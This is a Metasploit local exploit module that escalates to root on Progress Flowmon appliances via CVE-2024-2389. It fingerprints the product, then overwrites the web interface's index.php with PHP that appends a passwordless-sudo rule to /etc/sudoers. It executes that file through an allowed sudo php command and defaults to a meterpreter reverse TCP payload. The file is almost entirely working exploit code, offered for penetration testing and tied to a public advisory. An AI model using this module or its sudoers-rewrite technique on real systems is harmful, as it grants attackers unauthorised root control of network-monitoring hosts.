# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
    Rank = ExcellentRanking
  
    include Msf::Exploit::EXE
    include Msf::Exploit::FileDropper
    include Msf::Post::File
  
    prepend Msf::Exploit::Remote::AutoCheck
  
    def initialize(info = {})
      super(
        update_info(
          info,
          'Name' => 'Progress Flowmon Local sudo privilege escalation',
          'Description' => %q{
            This module abuses a feature of the sudo command on Progress Flowmon.
            Certain binary files are allowed to automatically elevate
            with the sudo command.  This is based off of the file name.  This
            includes executing a PHP command with a specific file name. If the
            file is overwritten with PHP code it can be used to elevate privileges
            to root.
          },
          'Author' => [
            'Dave Yesland with Rhino Security Labs',
          ],
          'License' => MSF_LICENSE,
          'References' => [
            ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/']
            ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
          ],
          'DisclosureDate' => '2024-03-19',
          'Notes' => {
            'Stability' => [ CRASH_SAFE ],
            'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
            'Reliability' => [ REPEATABLE_SESSION ]
          },
          'SessionTypes' => ['shell', 'meterpreter'],
          'Platform' => ['unix', 'linux'],
          'Arch' => [ARCH_X86, ARCH_X64],
          'Targets' => [['Automatic', {}]],
          'Privileged' => true,
          'DefaultOptions' => {
            'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
          }
        )
      )
    end
  
    def check
      score = 0
      score += 1 if read_file('/var/www/shtml/index.php').include?('FlowMon')
      score += 1 if read_file('/var/www/shtml/ui/manifest.json').include?('Flowmon Web Interface')
      score += 1 if exists?('/var/www/shtml/translate.php')
      vprint_status("Found #{score} indicators this is a Progress Flowmon product")
      return CheckCode::Detected if score > 0
  
      return CheckCode::Safe
    end
  
    def exploit
  
      begin
        vprint_status('Copying /var/www/shtml/index.php to /tmp/index.php.bak')
        cmd_exec('cp /var/www/shtml/index.php /tmp/index.php.bak')
        vprint_status('Overwriting /var/www/shtml/index.php with payload')
        cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
        vprint_status('Executing sudo to elevate privileges')
        cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
        vprint_status('Replacing index.php with original file')
        cmd_exec('cp /tmp/index.php.bak /var/www/shtml/index.php')
        vprint_status('You should be able to use "sudo -i" for a root shell...')
      end
    end
  end